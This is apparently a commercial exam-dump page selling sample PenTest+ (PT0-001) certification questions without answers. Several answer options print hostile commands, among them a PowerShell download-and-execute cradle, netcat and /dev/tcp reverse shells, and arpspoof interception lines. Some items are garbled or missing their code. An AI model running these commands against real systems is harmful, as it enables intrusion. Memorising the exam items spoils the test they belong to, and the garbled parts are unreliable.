Labour Day Sale - Limited Time 60% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: 575363r9

Welcome To DumpsPedia

PT0-001 Sample Questions Answers

Questions 4

Which of the following BEST explains why it is important to maintain confidentiality of any identified findings when performing a penetration test?

Options:

A.

Penetration test findings often contain company intellectual property

B.

Penetration test findings could lead to consumer dissatisfaction if made pubic

C.

Penetration test findings are legal documents containing privileged information

D.

Penetration test findings can assist an attacker in compromising a system

Buy Now
Questions 5

Which of the following would BEST prevent fence jumping at a facility?

Options:

A.

Install proper lighting around the perimeter of the facility.

B.

Decrease the distance between the links in the fence.

C.

Add a top guard on the fence that faces away from the facility.

D.

Place video cameras that are angled toward the fence.

Buy Now
Questions 6

A company decides to remediate issues identified from a third-party penetration test done to its infrastructure.

Management should instruct the IT team to:

Options:

A.

execute the hot fixes immediately to all vulnerabilities found.

B.

execute the hot fixes immediately to some vulnerabilities.

C.

execute the hot fixes during the routine quarterly patching.

D.

evaluate the vulnerabilities found and execute the hot fixes.

Buy Now
Questions 7

Which of the following reasons does penetration tester needs to have a customer's point-of -contact information available at all time? (Select THREE).

Options:

A.

To report indicators of compromise

B.

To report findings that cannot be exploited

C.

To report critical findings

D.

To report the latest published exploits

E.

To update payment information

F.

To report a server that becomes unresponsive

G.

To update the statement o( work

Buy Now
Questions 8

Which of the following BEST describes why an MSA is helpful?

Options:

A.

It contractually binds both parties to not disclose vulnerabilities.

B.

It reduces potential for scope creep.

C.

It clarifies the business arrangement by agreeing to specific terms.

D.

It defines the timelines for the penetration test.

Buy Now
Questions 9

Which of the following would be BEST for performing passive reconnaissance on a target's external domain?

Options:

A.

Peach

B.

CeWL

C.

OpenVAS

D.

Shodan

Buy Now
Questions 10

Which of the following CPU register does the penetration tester need to overwrite in order to exploit a simple butter overflow?

Options:

A.

Stack pointer register

B.

Index pointer register

C.

Stack base pointer

D.

Destination index register

Buy Now
Questions 11

A penetration tester is using the Onesixtyone tool on Kali Linux to try to exploit the SNMP protocol on a target that has SNMP enabled Which of the following types of attacks is the penetration tester performing?

Options:

A.

Buffer overflow attack

B.

Man-in-the-middle attack

C.

Dictionary-based attack

D.

Name resolution attack

Buy Now
Questions 12

Consider the following PowerShell command:

powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/

script.ps1”);Invoke-Cmdlet

Which of the following BEST describes the actions performed this command?

Options:

A.

Set the execution policy

B.

Execute a remote script

C.

Run an encoded command

D.

Instantiate an object

Buy Now
Questions 13

A malicious user wants to perform an MITM attack on a computer. The computer network configuration is given below:

IP: 192.168.1.20

NETMASK: 255.255.255.0

DEFAULT GATEWAY: 192.168.1.254

DHCP: 192.168.1.253

DNS: 192.168.10.10, 192.168.20.10

Which of the following commands should the malicious user execute to perform the MITM attack?

Options:

A.

arpspoof -c both -r -t 192.168.1.1 192.168.1.20

B.

arpspoof -t 192.168.1.20 192.168.1.254

C.

arpspoof -c both -t 192.168.1.20 192.168.1.253

D.

arpspoof -r -t 192 .168.1.253 192.168.1.20

Buy Now
Questions 14

A penetration tester executes the following commands:

C:\>%userprofile%\jtr.exe

This program has been blocked by group policy

C:\> accesschk.exe -w -s -q -u Users C:\Windows

rw C:\Windows\Tracing

C:\>copy %userprofile%\jtr.exe C:\Windows\Tracing

C:\Windows\Tracing\jtr.exe

jtr version 3.2…

jtr>

Which of the following is a local host vulnerability that the attacker is exploiting?

Options:

A.

Insecure file permissions

B.

Application Whitelisting

C.

Shell escape

D.

Writable service

Questions 15

Which of the following properties of the penetration testing engagement agreement will have the largest impact on observing and testing production systems at their highest loads?

Options:

A.

Creating a scope of the critical production systems

B.

Setting a schedule of testing access times

C.

Establishing a white-box testing engagement

D.

Having management sign-off on intrusive testing

Buy Now
Questions 16

A client has scheduled a wireless penetration test. Which of the following describes the scoping target

information MOST likely needed before testing can begin?

Options:

A.

The physical location and network ESSIDs to be tested

B.

The number of wireless devices owned by the client

C.

The client's preferred wireless access point vendor

D.

The bands and frequencies used by the client's devices

Buy Now
Questions 17

A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10. Which of the following would accomplish this task?

Options:

A.

From the remote computer, run the following commands:

Export IHOST 192.168.1.10:0.0

xhost+

Terminal

B.

From the local computer, run the following command

ssh -L4444 : 127.0.01:6000 -% users@10.0.0.20 xterm

C.

From the local computer, run the following command

ssh -r6000 : 127.0.01:4444 -p 6000 users@192.168.1.10 “xhost+; xterm”

D.

From the local computer, run the following command

Nc -1 -p 6000

Then, from the remote computer, run the following command

Xterm | nc 192.168.1.10 6000

Buy Now
Questions 18

Which of the following should a penetration tester verify prior to testing the login and permissions management for a web application that is protected by a CDN-based WAF?

Options:

A.

If an NDA is signed with the CDN company

B.

If the SSL certificates for the web application are valid

C.

If a list of the applicable WAF rules was obtained

D.

If the IP addresses for the penetration tester are whitelisted on the WAF

Buy Now
Questions 19

Which of the following actions BEST matches a script kiddie's threat actor?

Options:

A.

Exfiltrate network diagrams to perform lateral movement

B.

Steal credit cards from the database and sell them in the deep web

C.

Install a rootkit to maintain access to the corporate network

D.

Deface the website of a company in search of retribution

Buy Now
Questions 20

A penetration tester reports an application is only utilizing basic authentication on an Internet-facing

application. Which of the following would be the BEST remediation strategy?

Options:

A.

Enable HTTP Strict Transport Security.

B.

Enable a secure cookie flag.

C.

Encrypt the communication channel.

D.

Sanitize invalid user input.

Buy Now
Questions 21

A static code analysis report of a web application can be leveraged to identify:

Options:

A.

business logic flaws.

B.

insufficient input sanitization.

C.

session fixation issues.

D.

client-side data storage.

E.

clickjacking.

Buy Now
Questions 22

A penetration tester locates a few unquoted service paths during an engagement. Which of the following can the tester attempt to do with these?

Options:

A.

Attempt to crack the service account passwords.

B.

Attempt DLL hijacking attacks.

C.

Attempt to locate weak file and folder permissions.

D.

Attempt privilege escalation attacks.

Buy Now
Questions 23

A penetration tester notices that the X-Frame-Optjons header on a web application is not set. Which of the following would a malicious actor do to exploit this configuration setting?

Options:

A.

Use path modification to escape the application's framework.

B.

Create a frame that overlays the application.

C.

Inject a malicious iframe containing JavaScript.

D.

Pass an iframe attribute that is malicious.

Buy Now
Questions 24

Which of the following tools would a penetration tester leverage to conduct OSINT? (Select TWO).

Options:

A.

Shodan

B.

SET

C.

BeEF

D.

Wireshark

E.

Maltego

F.

Dynamo

Buy Now
Questions 25

If a security consultant comes across a password hash that resembles the following

b117 525b3454 7Oc29ca3dBaeOb556ba8

Which of the following formats is the correct hash type?

Options:

A.

Kerberos

B.

NetNTLMvl

C.

NTLM

D.

SHA-1

Buy Now
Questions 26

During an engagement an unsecure direct object reference vulnerability was discovered that allows the extraction of highly sensitive PII. The tester is required to extract and then exfil the information from a web application with identifiers 1 through 1000 inclusive. When running the following script, an error is encountered:

Which of the following lines of code is causing the problem?

Options:

B.

req = requests.get(url)

C.

if req.status ==200:

D.

url += i

Buy Now
Questions 27

A penetration tester is performing initial intelligence gathering on some remote hosts prior to conducting a vulnerability scan.

The tester runs the following command:

nmap -p 192.168.1.1, 192.168.1.2, 192.168.1.3 -sV -o --max-rate 2 192.168.1.130

Which of the following BEST describes why multiple IP addresses are specified?

Options:

A.

The network is subnetted as a/25 or greater, and the tester needed to access hosts on two different subnets.

B.

The tester is trying to perform a more stealthy scan by including several bogus addresses.

C.

The scanning machine has several interfaces to balance the scan request across at the specified rate.

D.

A discovery scan is run on the first set of addresses, whereas a deeper, more aggressive scan is run against the latter host.

Buy Now
Questions 28

A company hires a penetration tester to determine if there are any vulnerabilities in its new VPN concentrator installation with an external IP of 100.170.60.6. Which of the following commands will test if the VPN is available?

Options:

A.

fpipe.exe -1 8080 -r 80 100.170.60.5

B.

ike-scan -A -t 1 --sourceip=apoof_ip 100.170.60.5

C.

nmap -sS -A -f 100.170.60.5

D.

nc 100.170.60.5 8080 /bin/sh

Buy Now
Questions 29

After several attempts, an attacker was able to gain unauthorized access through a biometric sensor using the attacker's actual fingerprint without exploitation. Which of the following is the MOST likely explanation of what happened?

Options:

A.

The biometric device is tuned more toward false positives

B.

The biometric device is configured more toward true negatives

C.

The biometric device is set to fail closed

D.

The biometnc device duplicated a valid user's fingerpnnt.

Buy Now
Questions 30

A security consultant receives a document outlining the scope of an upcoming penetration test. This document

contains IP addresses and times that each can be scanned. Which of the following would contain this information?

Options:

A.

Rules of engagement

B.

Request for proposal

C.

Master service agreement

D.

Business impact analysis

Buy Now
Questions 31

A company performed an annual penetration test of its environment. In addition to several new findings, all of the previously identified findings persisted on the latest report. Which of the following is the MOST likely reason?

Options:

A.

Infrastructure is being replaced with similar hardware and software.

B.

Systems administrators are applying the wrong patches.

C.

The organization is not taking action to remediate identified findings.

D.

The penetration testing tools were misconfigured.

Buy Now
Questions 32

Joe, a penetration tester, has received basic account credentials and logged into a Windows system. To escalate his privilege, from which of the following places is he using Mimikatz to pull credentials?

Options:

A.

LSASS

B.

SAM database

C.

Active Directory

D.

Registry

Buy Now
Questions 33

You are a penetration tester reviewing a client’s website through a web browser.

INSTRUCTIONS

Review all components of the website through the browser to determine if vulnerabilities are present.

Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Options:

Buy Now
Questions 34

During an internal penetration test, several multicast and broadcast name resolution requests are observed traversing the network. Which of the following tools could be used to impersonate network resources and collect authentication requests?

Options:

A.

Ettercap

B.

Tcpdump

C.

Responder

D.

Medusa

Buy Now
Questions 35

A technician is reviewing the following report. Given this information, identify which vulnerability can be definitively confirmed to be a false positive by dragging the “false positive” token to the “Confirmed” column for each vulnerability that is a false positive.

Options:

Buy Now
Questions 36

Which of the following commands will allow a tester to enumerate potential unquoted services paths on a host?

Options:

A.

wmic environment get name, variablevalue, username / findstr /i “Path” | findstr /i “service”

B.

wmic service get /format:hform > c:\temp\services.html

C.

wmic startup get caption, location, command | findstr /i “service” | findstr /v /i “%”

D.

D. wmic service get name, displayname, patchname, startmode | findstr /i “auto” | findstr /i /v “c:\windows\\” | findstr /i /v “””

Buy Now
Questions 37

Which of the following is the purpose of an NDA?

Options:

A.

Outlines the terms of confidentiality between both parties

B.

Outlines the boundaries of which systems are authorized for testing

C.

Outlines the requirements of technical testing that are allowed

D.

Outlines the detailed configuration of the network

Buy Now
Questions 38

Instructions:

Analyze the code segments to determine which sections are needed to complete a port scanning script.

Drag the appropriate elements into the correct locations to complete the script.

If at any time you would like to bring back the initial state of the simulation, please click the reset all button.

During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.

Options:

Buy Now
Questions 39

Which of the following can be used to perform online password attacks against RDP?

Options:

A.

Hashcat

B.

John the Rippef

C.

Aircrack-ng

D.

Ncrack

Buy Now
Questions 40

A client asks a penetration tester to add more addresses to a test currently in progress. Which of the following would defined the target list?

Options:

A.

Rules of engagement

B.

Master services agreement

C.

Statement of work

D.

End-user license agreement

Buy Now
Questions 41

A penetration tester compromises a system that has unrestricted network over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester mostly like use?

Options:

A.

perl -e ‘ use SOCKET’; $i=’; $p=’443;

B.

ssh superadmin@ -p 443

C.

nc -e /bin/sh 443

D.

bash -i >& /dev/tcp// 443 0>&1

Buy Now
Questions 42

A penetration tester identifies prebuilt exploit code containing Windows imports for VirtualAllocEx and LoadLibraryA functions. Which of the following techniques is the exploit code using?

Options:

A.

DLL hijacking

B.

DLL sideloading

C.

DLL injection

D.

DLL function hooking

Buy Now
Questions 43

When performing compliance-based assessments, which of the following is the MOST important Key consideration?

Options:

A.

Additional rate

B.

Company policy

C.

Impact tolerance

D.

Industry type

Buy Now
Questions 44

A penetration tester is performing a remote scan to determine if the server farm is compliant with the company's software baseline . Which of the following should the penetration tester perform to verify compliance with the baseline?

Options:

A.

Discovery scan

B.

Stealth scan

C.

Full scan

D.

Credentialed scan

Buy Now
Status:
Expired , and Replaced By
Exam Code: PT0-001
Exam Name: CompTIA PenTest+ Exam
Last Update: Apr 14, 2023
Questions: 294
$64  $159.99
$48  $119.99
$40  $99.99
buy now PT0-001